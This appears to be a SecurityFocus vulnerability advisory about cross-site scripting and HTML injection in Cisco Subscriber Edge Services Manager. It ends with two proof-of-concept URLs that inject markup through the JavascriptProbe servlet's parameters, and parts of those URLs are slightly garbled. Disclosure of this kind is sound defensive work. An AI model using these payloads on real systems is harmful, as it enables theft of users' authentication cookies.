source: https://www.securityfocus.com/bid/34454/info Cisco Subscriber Edge Services Manager is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges. http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3& getElementById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms= true&links=true&frames=true&screen=%20true">" http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElem entById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&li nks=trueHTML Injection&frames=true&screen=true&